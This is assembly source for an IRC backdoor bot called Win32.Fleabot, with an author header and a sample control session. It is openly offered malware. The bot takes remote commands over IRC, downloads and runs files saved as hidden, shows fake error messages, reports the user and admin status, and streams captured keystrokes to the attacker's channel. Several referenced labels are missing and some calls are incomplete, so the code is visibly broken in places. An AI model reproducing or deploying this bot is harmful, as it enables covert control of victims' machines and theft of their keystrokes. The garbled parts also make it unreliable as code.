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;Win32.Fleabot by DiA/RRLF
; This is a small and simple IRC bot coded in assembler (use FASM to assemble). I
; wanted to write a small tutorial along with this source, but I am lazy dude ;).
; But don't cry, the code is very well commented and easy to understand. The bot
; has 12 commands, wich you can see in the example session. For greets and fucks
; use my guestbook at vx-dia.de.vu or drop me some mail to DiA_hates_machine@gmx.de
; Now have fun with this little code, assembled just 8kb baby.
;------- example session start------------------------------------------------------
;[10:52] * Now talking in #test
;[10:53] <DiAbolicx> ^^raw mode #test +o DiAbolicx
;[10:53] <workwqbz> bot is locked, use unlock <password>
;[10:53] <DiAbolicx> ^^unlock test
;[10:53] <workwqbz> bot now unlocked
;[10:53] <DiAbolicx> ^^raw mode #test +o DiAbolicx
;[10:53] * workwqbz sets mode: +o DiAbolicx
;[10:53] <DiAbolicx> ^^cmds
;[10:53] <workwqbz> unlock <password> - unlock the bot
;[10:53] <workwqbz> lock - lock the bot
;[10:53] <workwqbz> raw <irc command> - send irc command to server
;[10:53] <workwqbz> dl <http url> | <save as path> - download file from http
;[10:53] <workwqbz> exec <path> - execute a application
;[10:53] <workwqbz> msgbox <title> | <message> - show fake error message
;[10:53] <workwqbz> info - get username, system directory and is admin
;[10:53] <workwqbz> livelog - start logging keys and send it to channel
;[10:53] <workwqbz> stoplog - stop logging keys
;[10:53] <workwqbz> cmds - show available commands
;[10:53] <workwqbz> version - show bot version
;[10:53] <workwqbz> quit - quit bot
;[10:53] <DiAbolicx> ^^raw privmsg #test :yes, i am here
;[10:53] <workwqbz> yes, i am here
;[10:56] <DiAbolicx> ^^dl | D:\calcx.exe
;[10:56] <workwqbz> download successful
;[10:56] <DiAbolicx> ^^exec D:\calcx.exe
;[10:57] <workwqbz> successful executed
;[10:57] <DiAbolicx> ^^msgbox Fleabot | Test message, dude
;[10:57] <workwqbz> message box closed by user
;[10:57] <DiAbolicx> ^^info
;[10:57] <workwqbz> Username: Work, System directory: C:\WINDOWS\system32, Admin: No
;[10:58] <DiAbolicx> ^^version
;[10:58] <workwqbz> Fleabot - a example IRC bot in asm
;[10:58] <DiAbolicx> ^^livelog
;[10:58] <workwqbz> live keylogging thread created
;[10:58] <workwqbz> {crlf}THIS IS A TEST I TYPE THIS IN MY EDITOR AND
;[10:58] <DiAbolicx> ^^stoplog
;[10:58] <workwqbz> keylogging thread terminated
;[10:59] <DiAbolicx> ^^quit
;[10:59] * workwqbz (~workwqbz@dianet.org) Quit (workwqbz)
;------- example session end--------------------------------------------------------
include "%fasminc%\win32ax.inc" ;equates, api's and macros making living easier
entry Bot ;define code start
IRCServer equ "", 0 ;to this server we want to connect
IRCPort equ 6667d ;connect using this port
Channel equ "#test", 0 ;channel name
ChannelPassword equ "test", 0 ;the channel password
CommandPrefix equ "^^" ;what indicate commands
BotPassword equ "test", 0 ;bot password
CRLF equ 10d, 13d ;break
section '.data' data readable writeable ;here our datas will be stored
Version db "Fleabot - a example IRC bot in asm", 0 ;identify bot version
IsLocked db 0d ;to check if bot is locked or not
WSAData WSADATA ;used by WSAStartup, cleanup
SocketDesc dd ? ;socket descriptor is stored here
SockAddr dw AF_INET ;our sockaddr_in structure
SockAddr_Port dw ? ;here we save the port
SockAddr_IP dd ? ;here we save the ip
SockAddr_Zero rb 8d ;unused
RandomString rb 5d ;here we save a random string (a - z) for the nick
Username rb 36d ;here we store the user name for nick generation
UsernameSize dd 36d ;size of the buffer
Nickname rb 9d ;buffer for nickname
SendBuffer rb 512d ;the buffer where we store bytes to send
ReturnBuffer rb 512d ;the buffer where we story things to receive
ByteBuffer rb 2d ;for the RecvLine procedure
Pong db "PONG " ;prefix pong message
PongBuffer rb 16d ;buffer for the pong message
CommandBuffer rb 128d ;buffer to store command and parameters
Parameter1 rb 128d ;buffer for parameter 1
Parameter2 rb 128d ;buffer for parameter 2
InetHandle dd ? ;handle for download command
UrlHandle dd ? ;handle for download command
FileHandle dd ? ;handle of open files
ReadNext dd ? ;how much else to download
DownloadBuffer rb 1024d ;downoad kb for kb
BytesWritten dd ? ;for writefile
StartupInfo STARTUPINFO ;for create process
ProcessInfo PROCESS_INFORMATION ;for create process
SystemDir rb 256d ;buffer for system dir
ThreadId dd ? ;for creating live keylog thread
ThreadHandle dd ? ;store handle for thread
ThreadExitCode dd ? ;for terminating thread
KeylogBuffer rb 60d ;buffer for key strokes
section '.code' code readable executable ;code section
Bot: ;lets start
invoke WSAStartup,\ ;initiates sockets DLL
0101h,\ ;use version 1.1
WSAData ;pointer to wsadata strcuture
cmp eax, 0 ;successful?
jne Exit ;if not exit bot
invoke socket,\ ;create a socket
AF_INET,\ ;family
SOCK_STREAM,\ ;two way connection
0 ;no particular protocol
cmp eax, -1 ;successful?
je Exit ;if not exit
mov dword [SocketDesc], eax ;save socket descriptor
invoke inet_addr,\ ;covert ip string to dword
IRCServer ;the ip as string
mov dword [SockAddr_IP], eax ;save ip in sockaddr structure
invoke htons,\ ;convert port to the network byte order
IRCPort ;the port
mov word [SockAddr_Port], ax ;save it in the structure
invoke connect,\ ;now connect to server
dword [SocketDesc],\ ;the socket descriptor
SockAddr,\ ;pointer to the sockaddr structure
16d ;size of this structure
cmp eax, 0 ;successful?
jne Exit ;if not exit
call GenerateNickname ;generate the nickname
invoke lstrcpy,\ ;copy NICK to send buffer
SendBuffer,\ ;pointer
"NICK " ;nick command
invoke lstrcat,\ ;append the nickname
SendBuffer,\ ;to this
Nickname ;from this
call SendLine ;send buffer to irc server
invoke lstrcpy,\ ;copy USER to send buffer
SendBuffer,\ ;to this
"USER " ;from this
invoke lstrcat,\ ;append the nickname
SendBuffer,\ ;to this
Nickname ;from this
invoke lstrcat,\ ;append usermode
SendBuffer,\ ;to this
" 8 * :" ;usermode
invoke lstrcat,\ ;append nickname for user message
SendBuffer,\ ;to this
Nickname ;from this
call SendLine ;send buffer to server
GetMotd: ;we can join when "MOTD" message is over
call RecvLine ;get a line from server
call HandlePing ;handle ping
mov ecx, 0 ;clear counter
IsMotd: ;check for "MOTD"
cmp dword [ReturnBuffer + ecx], "MOTD" ;is there "MOTD"?
je HaveMotd ;then we can join
cmp byte [ReturnBuffer + ecx], 0d ;end of buffer?
je GetMotd ;check next line
inc ecx ;ecx + 1
jmp IsMotd ;check next position
HaveMotd: ;now we can join
invoke lstrcpy,\ ;copy JOIN to buffer
SendBuffer,\ ;pointer
"JOIN " ;join command
invoke lstrcat,\ ;append the channel
SendBuffer,\ ;pointer
Channel ;channel name
invoke lstrcat,\ ;append a space
SendBuffer,\ ;pointer
" " ;space
invoke lstrcat,\ ;append the channel password
SendBuffer,\ ;pointer
ChannelPassword ;pass
call SendLine ;send to server
invoke lstrcpy,\ ;copy MODE to buffer
SendBuffer,\ ;pointer
"MODE " ;to set key
invoke lstrcat,\ ;append channel
SendBuffer,\ ;pointer
Channel ;channel name
invoke lstrcat,\ ;append key mode and secret
SendBuffer,\ ;buffer
" +nsk " ;no external message, secret, key
invoke lstrcat,\ ;append the password aka key
SendBuffer,\ ;pointer
ChannelPassword ;the pass
call SendLine ;send it to irc server
RecvCommand: ;check if received line include a command
call RecvLine ;get a line
call HandlePing ;handle ping if it is
mov ecx, 0 ;set counter to zero
IsCommand: ;check if command
cmp word [ReturnBuffer + ecx], CommandPrefix ;is command prefix?
je HaveCommand ;then extract command
cmp byte [ReturnBuffer + ecx], 0 ;is end of line?
je RecvCommand ;then wait for next
inc ecx ;increase counter by one
jmp IsCommand ;check next position
HaveCommand: ;extract command
mov ebx, ReturnBuffer ;pointer to buffer
add ebx, ecx ;add counter
add ebx, 2d ;add length of command prefix
invoke lstrcpy,\ ;add to command buffer
CommandBuffer,\ ;pointer
ebx ;points to command position
call ExecuteCommand ;execute command
jmp RecvCommand ;next command
invoke WSACleanup ;cleanup the wsa
invoke ExitProcess,\ ;exit program
0 ;exit code
SendLine: ;this procedure sends a line to the irc server
invoke lstrcat,\ ;append crlf to the send buffer
SendBuffer,\ ;buffer
CRLF ;10d, 13d
invoke lstrlen,\ ;get length of buffer
SendBuffer ;buffer
invoke send,\ ;send this line
dword [SocketDesc],\ ;socket descriptor
SendBuffer,\ ;send this
eax,\ ;length of buffer
0 ;no flags
cmp eax, -1 ;succeddful?
je Exit ;if not exit
ret ;return to call
RecvLine: ;this procedure receive a line from server
mov dword [ReturnBuffer], 0 ;clear the buffer
GetLine: ;recv until crlf
invoke recv,\ ;receive a byte
dword [SocketDesc],\ ;socket descriptor
ByteBuffer,\ ;1 byte buffer
1d,\ ;get just one byte
0 ;no flags
cmp eax, 0 ;error?
je Exit ;if so, exit
cmp byte [ByteBuffer], 10d ;arrived crlf?
je HaveLine ;then return
invoke lstrcat,\ ;append byte to buffer
ReturnBuffer,\ ;pointer
ByteBuffer ;the byte
jmp GetLine ;receive next byte
HaveLine: ;we have a line and can..
ret ;...return
GenerateNickname: ;this procedure generates a random nick
mov ecx, 0 ;clear counter
GetByte: ;get a single byte
invoke GetTickCount ;get the run time
cmp al, 97d ;after "a"
jnb CheckBelow ;if so, check if its before "z"
jmp Sleep33 ;sleep 33 ms
cmp al, 122d ;before "z"
jna HaveByte ;then save byte
jmp Sleep33 ;sleep 33 ms
HaveByte: ;save a byte
mov byte [RandomString + ecx], al ;save byte at the position
inc ecx ;ecx + 1
cmp ecx, 4d ;got 4 bytes?
je GenerateIt ;now generate it
Sleep33: ;sleep 33ms and try again to get a byte a - z
push ecx ;push counter
invoke Sleep,\ ;sleep
33d ;33ms
pop ecx ;restore counter
jmp GetByte ;try to get a byte a -z
GenerateIt: ;have random string, now create nick
invoke GetUserName,\ ;get the logged on user name
Username,\ ;pointer to buffer
UsernameSize ;size of buffer
cmp eax, 0 ;successful?
jne ExtractUserName ;if so jump there
mov dword [Username], "rrlf" ;no user name got, fill it with text anyways
ExtractUserName: ;get 4 bytes from the user name
mov byte [Username + 4d], 0 ;set string end at 5th position
invoke lstrcpy,\ ;copy username to nick buffer
Nickname,\ ;pointer to buffer
Username ;pointer to buffer
invoke lstrcat,\ ;append random string
Nickname,\ ;to this
RandomString ;from this
invoke CharLowerBuff,\ ;now mae nick to lower
Nickname,\ ;the nick
8d ;length
ret ;return to call
HandlePing: ;this procedure handle ping and pong
cmp dword [ReturnBuffer], "PING" ;is a ping?
jne NoPing ;if not return
invoke lstrcpy,\ ;copy ping message to buffer
PongBuffer,\ ;to this
ReturnBuffer + 6d ;sendbuffer + "PING "
invoke lstrcpy,\ ;copy PONG message to sendbuffer
SendBuffer,\ ;buffer
Pong ;pong message
call SendLine ;send pong
NoPing: ;its not a ping
ret ;return
SendPrivmsg: ;send a message to channel
invoke lstrcpy,\ ;copy PRIVMSG to send buffer
SendBuffer,\ ;pointer
"PRIVMSG " ;irc command
invoke lstrcat,\ ;append channel
SendBuffer,\ ;pointer
Channel ;the chan
invoke lstrcat,\ ;append space
SendBuffer,\ ;pointer
" :" ;sepertor
invoke lstrcat,\ ;append message
SendBuffer,\ ;pointer
ReturnBuffer ;pointer
call SendLine ;send to server
ret ;return
ExecuteCommand: ;execute received command
cmp dword [CommandBuffer], "unlo" ;is unlock command?
je CmdUnlock ;execute it
cmp byte [IsLocked], 0 ;is bot locked?
je BotLocked ;jmp there
cmp dword [CommandBuffer], "cmds" ;is commands command?
je CmdCmds ;then show commands
cmp dword [CommandBuffer], "lock" ;is lock command?
je CmdLock ;lock it then
cmp dword [CommandBuffer], "quit" ;is quit command?
je CmdQuit ;quit from irc, exit
cmp dword [CommandBuffer], "raw " ;is raw command?
je CmdRaw ;execute raw irc command
cmp word [CommandBuffer], "dl" ;is download command?
je CmdDl ;download file from http
cmp dword [CommandBuffer], "exec" ;is execute command?
je CmdExec ;then execute application
cmp dword [CommandBuffer], "vers" ;is version command?
je CmdVersion ;show it then
cmp dword [CommandBuffer], "msgb" ;is msgbox command?
je CmdMsgbox ;show it then
cmp dword [CommandBuffer], "info" ;is info command?
je CmdInfo ;then show informations about victim
cmp dword [CommandBuffer], "live" ;is livelog command?
je CmdLivelog ;log it then
cmp dword [CommandBuffer], "stop" ;is stoplog command?
je CmdStoplog ;stop it then
invoke lstrcpy,\ ;unknown command
ReturnBuffer,\ ;pointer
"unknown command, type 'cmds' for commands" ;mesage
call SendPrivmsg ;send to chan
jmp ExecuteCommandReturn ;return
invoke lstrcpy,\ ;copy locked message to return buffer
ReturnBuffer,\ ;pointer
"bot is locked, use unlock <password>" ;message
call SendPrivmsg ;send it
jmp ExecuteCommandReturn ;return
CmdUnlock: ;unlock command
invoke lstrlen,\ ;get password len
BotPassword ;of this
inc eax ;eax + 1
invoke lstrcpyn,\ ;copy password to parameter1 buffer
Parameter1,\ ;pointer
CommandBuffer + 7d,\ ;skip "unlock "
eax ;dont copy the crlf
invoke lstrcmp,\ ;compare password
BotPassword,\ ;password
Parameter1 ;received password
cmp eax, 0 ;right pass?
jne WrongPassword ;if not send back wrong pass
mov byte [IsLocked], 1d ;set unlock code
invoke lstrcpy,\ ;tell user bot is unlocked
ReturnBuffer,\ ;buffer
"bot now unlocked" ;message
call SendPrivmsg ;send to channel
jmp ExecuteCommandReturn ;return
invoke lstrcpy,\ ;copy wrong pass message
ReturnBuffer,\ ;pointer
"wrong password" ;message
call SendPrivmsg ;send to chan
jmp ExecuteCommandReturn ;return
CmdCmds: ;show all comands
invoke lstrcpy,\ ;copy unlock command
ReturnBuffer,\ ;pointer to buffer
"unlock <password> - unlock the bot" ;message
call SendPrivmsg ;send it to channel
invoke Sleep,\ ;sleep a second
1000d ;1 sec
invoke lstrcpy,\ ;copy lock command
ReturnBuffer,\ ;pointer to buffer
"lock - lock the bot" ;message
call SendPrivmsg ;send it to channel
invoke Sleep,\ ;sleep a second
1000d ;1 sec
invoke lstrcpy,\ ;copy raw command
ReturnBuffer,\ ;pointer to buffer
"raw <irc command> - send irc command to server" ;message
call SendPrivmsg ;send it to channel
invoke Sleep,\ ;sleep a second
1000d ;1 sec
invoke lstrcpy,\ ;copy dl command
ReturnBuffer,\ ;pointer to buffer
"dl <http url> | <save as path> - download file from http" ;message
call SendPrivmsg ;send it to channel
invoke Sleep,\ ;sleep a second
1000d ;1 sec
invoke lstrcpy,\ ;copy exec command
ReturnBuffer,\ ;pointer to buffer
"exec <path> - execute a application" ;message
call SendPrivmsg ;send it to channel
invoke Sleep,\ ;sleep a second
1000d ;1 sec
invoke lstrcpy,\ ;copy msgbox command
ReturnBuffer,\ ;pointer to buffer
"msgbox <title> | <message> - show fake error message" ;message
call SendPrivmsg ;send it to channel
invoke Sleep,\ ;sleep a second
1000d ;1 sec
invoke lstrcpy,\ ;copy info command
ReturnBuffer,\ ;pointer to buffer
"info - get username, system directory and is admin" ;message
call SendPrivmsg ;send it to channel
invoke Sleep,\ ;sleep a second
1000d ;1 sec
invoke lstrcpy,\ ;copy livelog command
ReturnBuffer,\ ;pointer to buffer
"livelog - start logging keys and send it to channel" ;message
call SendPrivmsg ;send it to channel
invoke Sleep,\ ;sleep a second
1000d ;1 sec
invoke lstrcpy,\ ;copy stoplog command
ReturnBuffer,\ ;pointer to buffer
"stoplog - stop logging keys" ;message
call SendPrivmsg ;send it to channel
invoke Sleep,\ ;sleep a second
1000d ;1 sec
invoke lstrcpy,\ ;copy cmds command
ReturnBuffer,\ ;pointer to buffer
"cmds - show available commands" ;message
call SendPrivmsg ;send it to channel
invoke lstrcpy,\ ;copy version command
ReturnBuffer,\ ;pointer to buffer
"version - show bot version" ;message
call SendPrivmsg ;send it to channel
invoke Sleep,\ ;sleep a second
1000d ;1 sec
invoke lstrcpy,\ ;copy quit command
ReturnBuffer,\ ;pointer to buffer
"quit - quit bot" ;message
call SendPrivmsg ;send it to channel
invoke Sleep,\ ;sleep a second
1000d ;1 sec
jmp ExecuteCommandReturn ;return
CmdLock: ;lock command
mov byte [IsLocked], 0 ;set it as locked
invoke lstrcpy,\ ;return message
ReturnBuffer,\ ;buffer
"bot now locked" ;message
call SendPrivmsg ;send it
jmp ExecuteCommandReturn ;and return
CmdQuit: ;quit bot
invoke lstrcpy,\ ;copy QUIT to buffer
SendBuffer,\ ;pointer
"QUIT" ;quit command
call SendLine ;send it
invoke Sleep,\ ;sleep
2000d ;2 seconds
jmp Exit ;exit bot
CmdRaw: ;send raw command to irc server
invoke lstrcpy,\ ;copy command to buffer
SendBuffer,\ ;buffer
CommandBuffer + 4 ;skip "raw "
call SendLine ;send it
jmp ExecuteCommandReturn ;return
CmdDl: ;download file via http
call ExtractParameters ;get the two parameters
invoke InternetOpen,\ ;initialise wininet
Parameter1,\ ;use url as agent, not necessary
0,\ ;get configs from registry (INTERNET_OPEN_TYPE_PRECONFIG)
0,\ ;no proxy
0,\ ;also no bypass
0 ;no flags
cmp eax, 0 ;error?
je DownloadFileError ;if so jump to error
mov dword [InetHandle], eax ;save handle
invoke InternetOpenUrl,\ ;open the http url
dword [InetHandle],\ ;handle from internetopen
Parameter1 + 3,\ ;pointer to the url, pass "dl "
0,\ ;no need for headers
0,\ ;so are the length
0,\ ;no specific flags
0 ;no context needed
cmp eax, 0 ;error?
je DownloadFileError ;then show error
mov dword [UrlHandle], eax ;save handle
invoke CreateFile,\ ;create the file for writing
Parameter2,\ ;pointer to filename
GENERIC_WRITE,\ ;we just want to write
FILE_SHARE_WRITE,\ ;write it
0,\ ;security attributes, nohh
CREATE_NEW,\ ;fail if file exist
FILE_ATTRIBUTE_HIDDEN,\ ;make it as hidden
0 ;no template file
cmp eax, 0 ;error?
je DownloadFileError ;send error back
mov dword [FileHandle], eax ;save handle
inc dword [ReadNext] ;increase readnext by one
ReadNextBytes: ;read bytes by bytes
cmp dword [ReadNext], 0 ;no more to read
je DownloadComplete ;then download complete
invoke InternetReadFile,\ ;read from the open url
dword [UrlHandle],\ ;open handle
DownloadBuffer,\ ;pointer to buffer
1024d,\ ;bytes to read, kbyte by kbyte
ReadNext ;how much bytes readed?
invoke WriteFile,\ ;write bytes to file
dword [FileHandle],\ ;open handle
DownloadBuffer,\ ;point to downloaded bytes
dword [ReadNext],\ ;write that much bytes
BytesWritten,\ ;how much bytes are written
0 ;no overlapped
jmp ReadNextBytes ;process next bytes
DownloadComplete: ;download is complete
invoke CloseHandle,\ ;close file
dword [FileHandle] ;via handle
invoke InternetCloseHandle,\ ;close inet
dword [UrlHandle] ;via handle
invoke InternetCloseHandle,\ ;again
dword [InetHandle] ;via handle
invoke lstrcpy,\ ;copy success message
ReturnBuffer,\ ;to return buffer
"download successful" ;message
call SendPrivmsg ;send to channel
jmp ExecuteCommandReturn ;return
invoke lstrcpy,\ ;copy fail message
ReturnBuffer,\ ;to return buffer
"download failed" ;message
call SendPrivmsg ;send to channel
jmp ExecuteCommandReturn ;return
CmdExec: ;execute a file
invoke lstrlen,\ ;get length of buffer
CommandBuffer ;of this
mov byte [CommandBuffer + eax - 1], 0 ;clear the crlf
invoke CreateProcess,\ ;via create process
CommandBuffer + 5d,\ ;application, skip "exec "
CommandBuffer + 5d,\ ;user
0,\ ;no process attributes
0,\ ;no thread attributes
0,\ ;no inerhits
CREATE_NEW_CONSOLE,\ ;own process
0,\ ;no environment
0,\ ;nor current directory
StartupInfo,\ ;startup structure
ProcessInfo ;process structure
cmp eax, 0 ;error?
je ExecError ;show it then
invoke lstrcpy,\ ;copy message
ReturnBuffer,\ ;to this
"successful executed" ;yehaw
call SendPrivmsg ;send to chan
jmp ExecuteCommandReturn ;return
ExecError: ;error occured
invoke lstrcpy,\ ;copy message
ReturnBuffer,\ ;to this
"execution failed" ;damn
call SendPrivmsg ;send to chan
jmp ExecuteCommandReturn ;return
CmdVersion: ;show bot version
invoke lstrcpy,\ ;copy version to buffer
ReturnBuffer,\ ;pointer
Version ;from version
call SendPrivmsg ;send to channel
jmp ExecuteCommandReturn ;return
CmdMsgbox: ;show a error message box
call ExtractParameters ;get two parameters
invoke MessageBox,\ ;show messagbox, local
0,\ ;no owner
Parameter2,\ ;Text
Parameter1 + 7d,\ ;title, skip "msgbox "
MB_ICONERROR ;error style
invoke lstrcpy,\ ;copy message
ReturnBuffer,\ ;pointer
"message box closed by user" ;message
call SendPrivmsg ;send to channe<6E>
jmp ExecuteCommandReturn ;return
CmdInfo: ;show informations
invoke lstrcpy,\ ;copy "Username" to buffer
ReturnBuffer,\ ;pointer
"Username: " ;msg
invoke GetUserName,\ ;get user name
Username,\ ;buffer
UsernameSize ;size
invoke lstrcat,\ ;copy username
ReturnBuffer,\ ;buffer
Username ;pointer
invoke lstrcat,\ ;copy "sysdir"
ReturnBuffer,\ ;to buffer
", System directory: " ;msg
invoke GetSystemDirectory,\ ;get sys dir to test
SystemDir,\ ;buffer
256d ;size
invoke lstrcat,\ ;copy to buffer
ReturnBuffer,\ ;to buffer
SystemDir ;from here
invoke lstrcat,\ ;append "admin"
ReturnBuffer,\ ;buffer
", Admin: "
invoke lstrcat,\ ;append filename to system dir
SystemDir,\ ;to buffer
"DiA.RRLF" ;filename ;)
invoke CreateFile,\ ;try to create this file
SystemDir,\ ;file in system directory
GENERIC_WRITE,\ ;check write
0,\ ;no security attributes
CREATE_ALWAYS,\ ;overwrite if exist
0 ;no template file
cmp eax, -1 ;error?
je NoAdmin ;then user is no admin
invoke lstrcat,\ ;copy "yes"
ReturnBuffer,\ ;to buffer
"Yes" ;message
call SendPrivmsg ;send to channel
jmp ExecuteCommandReturn ;and return
NoAdmin: ;user is no admin
invoke lstrcat,\ ;copy "no"
ReturnBuffer,\ ;to buffer
"No" ;message
call SendPrivmsg ;send to channel
jmp ExecuteCommandReturn ;and return
CmdLivelog: ;create a thread for live keylogging
invoke CreateThread,\ ;create the keylog thread
0,\ ;no security attributes
0,\ ;default stack size
LiveKeylog,\ ;procedure start
0,\ ;no parameters
0,\ ;start right now
ThreadId ;store here the thread id
cmp eax, 0 ;error?
je ThreadError ;then jump there
mov dword [ThreadHandle], eax ;store thread handle
invoke lstrcpy,\ ;copy success message
ReturnBuffer,\ ;to the buffer
"live keylogging thread created" ;yehaw
call SendPrivmsg ;send to channel
jmp ExecuteCommandReturn ;ret
invoke lstrcpy,\ ;copy error message
ReturnBuffer,\ ;to this
"error on creating live keylogging thread" ;buh
call SendPrivmsg ;send it
jmp ExecuteCommandReturn ;return
CmdStoplog: ;stop keylogging thread
invoke GetExitCodeThread,\ ;get exit code to terminate thread
dword [ThreadHandle],\ ;thread handle
ThreadExitCode ;store it here
invoke TerminateThread,\ ;exit it now
dword [ThreadHandle],\ ;handle
dword [ThreadExitCode] ;with this
cmp eax, 0 ;error?
je ExitThreadError ;show it then
mov dword [ThreadId], 0 ;clear id
mov dword [ThreadHandle], 0 ;clear handle
mov dword [ThreadExitCode], 0 ;clear exit code
invoke lstrcpy,\ ;copy sucess message
ReturnBuffer,\ ;to buffer
"keylogging thread terminated" ;msg
call SendPrivmsg ;send it
jmp ExecuteCommandReturn ;ret
ExitThreadError: ;arghh, maybe not exist
invoke lstrcpy,\ ;copy error message
ReturnBuffer,\ ;to buffer
"error terminating keylogging thread" ;msg
call SendPrivmsg ;send it
jmp ExecuteCommandReturn ;ret
ExecuteCommandReturn: ;return
ret ;return to call
ExtractParameters: ;this procedure extracts two parameter from a cmd
mov edx, CommandBuffer ;pointer to buffer
mov ecx, 0 ;zero counter
FindCut: ;get the "|" cur
cmp byte [edx + ecx], "|" ;is byte at position a "|"?
je HaveCut ;then extract it
inc ecx ;counter + 1
jmp FindCut ;scan next position
HaveCut: ;have cut, extract it
add edx, ecx ;add counter to start of buffer
mov byte [edx - 1], 0 ;zero the "|"
add edx, 2d ;skip space
invoke lstrcpy,\ ;copy parameter2
Parameter2,\ ;destination
edx ;source
invoke lstrlen,\ ;get length to erase crlf
Parameter2 ;of buffer
mov byte [Parameter2 + eax - 1], 0 ;erase crlf
invoke lstrcpy,\ ;copy parameter1
Parameter1,\ ;buffer
CommandBuffer ;source
ret ;return to call
LiveKeylog: ;this procedure logs keys and send it to channel
invoke lstrlen,\ ;get legth of buffer
KeylogBuffer ;key strokes buffer
cmp eax, 50d ;is over 50 characters?
jae SendKeyLine ;then send it to channel
mov ebx, 0 ;set counter to zero (just use ebx because api dont change it
NextKey: ;try if next key is pressed
cmp ebx, 255d ;end of possible keys?
je LiveKeylog ;the try from start again
invoke GetAsyncKeyState,\ ;get status of this key
ebx ;in ebx (0 - 255)
cmp eax, -32767d ;is pressed?
jne ScanNextKey ;if not check next possible key
cmp ebx, 20h ;VK_SPACE
je IsSpace ;if it is this key, jump there
cmp ebx, 8h ;VK_BACK
je IsBack ;if it is this key, jump there
cmp ebx, 9h ;VK_TAB
je IsTab ;if it is this key, jump there
cmp ebx, 60h ;VK_NUMPAD0
je IsNumpad0 ;if it is this key, jump there
cmp ebx, 61h ;VK_NUMPAD1
je IsNumpad1 ;if it is this key, jump there
cmp ebx, 62h ;VK_NUMPAD2
je IsNumpad2 ;if it is this key, jump there
cmp ebx, 63h ;VK_NUMPAD3
je IsNumpad3 ;if it is this key, jump there
cmp ebx, 64h ;VK_NUMPAD4
je IsNumpad4 ;if it is this key, jump there
cmp ebx, 65h ;VK_NUMPAD5
je IsNumpad5 ;if it is this key, jump there
cmp ebx, 66h ;VK_NUMPAD6
je IsNumpad6 ;if it is this key, jump there
cmp ebx, 67h ;VK_NUMPAD7
je IsNumpad7 ;if it is this key, jump there
cmp ebx, 68h ;VK_NUMPAD8
je IsNumpad8 ;if it is this key, jump there
cmp ebx, 69h ;VK_NUMPAD9
je IsNumpad9 ;if it is this key, jump there
cmp ebx, 0Dh ;VK_RETURN
je IsReturn ;if it is this key, jump there
cmp ebx, 30h ;VK_0
jae CheckIsKey ;if its above "1" its possible key
ScanNextKey: ;check next key if its pressed
inc ebx ;increase counter by one
jmp NextKey ;check it baby
cmp ebx, 5Ah ;VK_Z
jbe IsKey ;is key from 1 - Z
jmp ScanNextKey ;nop, scan next one
IsSpace: ;cat other key to buffer
invoke lstrcat,\
" "
jmp LiveKeylog
IsBack: ;cat other key to buffer
invoke lstrcat,\
jmp LiveKeylog
IsTab: ;cat other key to buffer
invoke lstrcat,\
jmp LiveKeylog
IsNumpad0: ;cat other key to buffer
invoke lstrcat,\
jmp LiveKeylog
IsNumpad1: ;cat other key to buffer
invoke lstrcat,\
jmp LiveKeylog
IsNumpad2: ;cat other key to buffer
invoke lstrcat,\
jmp LiveKeylog
IsNumpad3: ;cat other key to buffer
invoke lstrcat,\
jmp LiveKeylog
IsNumpad4: ;cat other key to buffer
invoke lstrcat,\
jmp LiveKeylog
IsNumpad5: ;cat other key to buffer
invoke lstrcat,\
jmp LiveKeylog
IsNumpad6: ;cat other key to buffer
invoke lstrcat,\
jmp LiveKeylog
IsNumpad7: ;cat other key to buffer
invoke lstrcat,\
jmp LiveKeylog
IsNumpad8: ;cat other key to buffer
invoke lstrcat,\
jmp LiveKeylog
IsNumpad9: ;cat other key to buffer
invoke lstrcat,\
jmp LiveKeylog
IsReturn: ;cat other key to buffer
invoke lstrcat,\
jmp LiveKeylog
IsKey: ;cat key to buffer
mov dword [ByteBuffer], ebx ;key is in ebx
invoke lstrcat,\ ;append it to the keylog buffer
KeylogBuffer,\ ;to this
ByteBuffer ;the logged key
jmp LiveKeylog ;log next key
invoke lstrcpy,\ ;send complete line to channel
SendBuffer,\ ;copy to send buffer
"PRIVMSG " ;irc command
invoke lstrcat,\ ;append channel
SendBuffer,\ ;to buffer
Channel ;this
invoke lstrcat,\ ;cat :
SendBuffer,\ ;to buffer
" :" ;guess
invoke lstrcat,\ ;append logged buffer
SendBuffer,\ ;to send buffer
KeylogBuffer ;from here
call SendLine ;send line to irc server
mov dword [KeylogBuffer], 0 ;empty buffer
jmp LiveKeylog ;log next
ret ;return to call
section '.idata' import data readable writeable ;imports
library kernel, "kernel32.dll",\
winsock, "ws2_32.dll",\
user, "user32.dll",\
advapi, "advapi32.dll",\
wininet, "wininet.dll"
import kernel,\
lstrcpy, "lstrcpyA",\
lstrcpyn, "lstrcpynA",\
lstrcat, "lstrcatA",\
lstrcmp, "lstrcmpA",\
lstrlen, "lstrlenA",\
GetTickCount, "GetTickCount",\
Sleep, "Sleep",\
CreateFile, "CreateFileA",\
WriteFile, "WriteFile",\
CloseHandle, "CloseHandle",\
CreateProcess, "CreateProcessA",\
CreateThread, "CreateThread",\
GetExitCodeThread, "GetExitCodeThread",\
TerminateThread, "TerminateThread",\
GetSystemDirectory, "GetSystemDirectoryA",\
ExitProcess, "ExitProcess"
import winsock,\
WSAStartup, "WSAStartup",\
socket, "socket",\
inet_addr, "inet_addr",\
htons, "htons",\
connect, "connect",\
recv, "recv",\
send, "send",\
WSACleanup, "WSACleanup"
import advapi,\
GetUserName, "GetUserNameA"
import user,\
CharLowerBuff, "CharLowerBuffA",\
MessageBox, "MessageBoxA",\
GetAsyncKeyState, "GetAsyncKeyState"
import wininet,\
InternetOpen, "InternetOpenA",\
InternetOpenUrl, "InternetOpenUrlA",\
InternetReadFile, "InternetReadFile",\
InternetCloseHandle, "InternetCloseHandle"